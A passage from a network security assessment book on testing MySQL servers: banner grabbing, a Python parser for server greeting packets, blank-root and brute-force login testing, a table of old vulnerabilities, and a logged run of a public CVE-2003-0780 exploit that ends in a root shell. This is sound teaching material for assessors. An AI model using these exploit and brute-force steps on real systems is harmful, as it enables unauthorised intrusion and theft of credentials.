8.11 MySQL


MySQL is commonly found running on TCP port 3306 on Linux and FreeBSD servers. The database is relatively straightforward to administer, with a much simpler access model than the heavyweight, but more scalable, Oracle.

8.11.1 MySQL Enumeration

The version of the target MySQL database can be gleaned simply by using nc or telnet to connect to port 3306 and examining the string the server returns, as shown here:

# telnet 10.0.0.8 3306
Trying 10.0.0.8...
Connected to 10.0.0.8.
Escape character is '^]'.
( 3.23.52D~n.7i.G,
Connection closed by foreign host.

The version of MySQL in this case is 3.23.52. If the server has been configured with a strict list of permitted client hosts, you will see a response like this:

# telnet db.example.org 3306
Trying 192.168.189.14...
Connected to db.example.org.
Escape character is '^]'.
PHost 'cyberforce.segfault.net' is not allowed to connect to this MySQL server
Connection closed by foreign host.
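The two responses above can be decoded rather than read by eye. The following Python is an added example, not code from the book or from MySQL itself; it parses the first packet a MySQL server sends after the TCP connect, which is either a protocol-10 handshake greeting (protocol byte 0x0a, a NUL-terminated server version, a 4-byte connection id and an 8-byte scramble) or an ERR packet (0xff, a 2-byte error code, then the message). The two sample packets are constructed for this example to match what the telnet sessions display: in the greeting the leading "(" is the byte 0x28, the 40-byte payload length that precedes the version string, and in the refusal the leading "P" is 0x50, the 80-byte length of the error payload. The connection id 7, capability flags and error code 1130 (ER_HOST_NOT_PRIVILEGED) are assumed values. A small version_tuple helper is included so a fingerprinted version can be compared against the affected versions listed later in this section.

```python
"""Decode the first packet a MySQL server sends to a client (added example)."""
import struct

# Constructed sample: a 3.23-era greeting. Byte 0x28 ('(') is the 40-byte
# payload length, which is why the telnet session shows "( 3.23.52...".
GREETING = (
    b"\x28\x00\x00"              # payload length = 40, little-endian, 3 bytes
    + b"\x00"                    # sequence id
    + b"\x0a"                    # protocol version 10
    + b"3.23.52\x00"             # server version, NUL-terminated
    + struct.pack("<I", 7)       # connection (thread) id, assumed value
    + b"D~n.7i.G"                # 8-byte scramble used for password hashing
    + b"\x00"                    # filler
    + struct.pack("<H", 0x002C)  # server capability flags, assumed value
    + b"\x08"                    # server character set
    + struct.pack("<H", 0x0002)  # status flags (autocommit)
    + b"\x00" * 13               # reserved
)

# Constructed sample: the refusal sent when the client host is not permitted.
ERR_MSG = b"Host 'cyberforce.segfault.net' is not allowed to connect to this MySQL server"
HOST_DENIED = (
    struct.pack("<I", 3 + len(ERR_MSG))[:3]  # payload length = 80 (0x50, the 'P' seen in telnet)
    + b"\x00"                                # sequence id
    + b"\xff"                                # ERR packet marker
    + struct.pack("<H", 1130)                # ER_HOST_NOT_PRIVILEGED, assumed value
    + ERR_MSG
)


def parse_mysql_first_packet(data: bytes) -> dict:
    """Return a dict describing a handshake greeting or an ERR packet."""
    if len(data) < 5:
        raise ValueError("packet too short for a MySQL header")
    length = int.from_bytes(data[0:3], "little")  # 3-byte payload length
    payload = data[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet: header says %d bytes, got %d"
                         % (length, len(payload)))

    if payload[0] == 0xFF:
        # ERR packet: 0xff, 2-byte error code, optional '#'+SQLSTATE (4.1+), message
        code = struct.unpack_from("<H", payload, 1)[0]
        message = payload[3:]
        sqlstate = None
        if message[:1] == b"#":
            sqlstate = message[1:6].decode("ascii", "replace")
            message = message[6:]
        return {"kind": "error", "code": code, "sqlstate": sqlstate,
                "message": message.decode("utf-8", "replace")}

    # Handshake greeting: protocol byte, NUL-terminated version, 4-byte id, scramble
    protocol = payload[0]
    nul = payload.index(b"\x00", 1)
    version = payload[1:nul].decode("ascii", "replace")
    connection_id = struct.unpack_from("<I", payload, nul + 1)[0]
    scramble = payload[nul + 5:nul + 13]
    return {"kind": "handshake", "protocol": protocol, "version": version,
            "connection_id": connection_id, "scramble": scramble}


def version_tuple(version: str) -> tuple:
    """'3.23.52', '4.0.15-log' or '3.23.53a' -> tuple of ints for comparison.

    Trailing letters and build suffixes are dropped, so '3.23.53a' compares
    equal to '3.23.53'; treat the result as a coarse check, not a patch level.
    """
    nums = []
    for part in version.split("-")[0].split("."):
        digits = ""
        for ch in part:
            if not ch.isdigit():
                break
            digits += ch
        nums.append(int(digits) if digits else 0)
    return tuple(nums)


if __name__ == "__main__":
    for pkt in (GREETING, HOST_DENIED):
        print(parse_mysql_first_packet(pkt))
    print(version_tuple("4.0.15-log"))
```

In practice the bytes come from a socket read right after connect; the server speaks first, so no request needs to be sent to obtain the greeting. Fingerprinting this way is the check to run against your own database hosts so that the version and the host allow-list behaviour can be confirmed from the network side.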

8.11.2 MySQL Brute Force

By default, the MySQL database accepts user logins as root with no password. A simple Unix-based utility called finger_mysql is useful for testing network blocks for MySQL instances that accept a blank root password, available in source form at http://www.securiteam.com/tools/6Y00L0U5PC.html.

Usefully, when the tool compromises the database, it lists the users and their password hashes from the mysql.user table. There are a number of tools in the Packet Storm archive that can be used to crack these password hashes.

If a blank root password doesn't provide access, the Hydra utility can be used to launch a parallel MySQL brute-force attack.

By performing brute-force password grinding and assessment of the database configuration, MetaCoretex can also assess MySQL instances efficiently. If you are responsible for the security of database services, I highly recommend that you use MetaCoretex to provide assurances relating to remote attack.

8.11.3 MySQL Process-Manipulation Vulnerabilities

At the time of writing, the ISS X-Force database (http://xforce.iss.net) lists a number of serious, remotely exploitable vulnerabilities in MySQL (that is, excluding issues that require authentication and denial-of-service issues), as shown in Table 8-7.

Table 8-7. Serious remotely exploitable MySQL vulnerabilities

XF ID   Date         Notes
12337   12/06/2003   MySQL 4.x and prior mysql_real_connect( ) overflow
10848   12/12/2002   MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER password overflow
10847   12/12/2002   MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER authentication bypass
6418    09/02/2001   MySQL 3.22.33 and prior crafted client hostname overflow
4228    08/02/2000   MySQL 3.22.32 and prior unauthenticated remote access vulnerability

A recent vulnerability that isn't listed within the ISS X-Force database at the time of writing is CVE-2003-0780, which relates to a remote vulnerability in MySQL 3.23.56 and 4.0.15 and prior. An exploit for this issue is available at http://packetstormsecurity.org/0309-exploits/09.14.mysql.c.

Example 8-20 shows the exploit script in use against a vulnerable MySQL server, providing root access to the operating system. For exploit usage and options, simply run the tool with no arguments.

Example 8-20. Using the CVE-2003-0780 exploit against MySQL

# ./mysql -d 10.0.0.8 -p "" -t 1
@-------------------------------------------------@
#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 10.0.0.8:3306....ok
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:test
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......ok
[+] Waiting a shell.....
bash-2.05#

Network Security Assessment: Know Your Network
ISBN: 059600611X
Year: 2006
Pages: 166
Authors: Chris McNab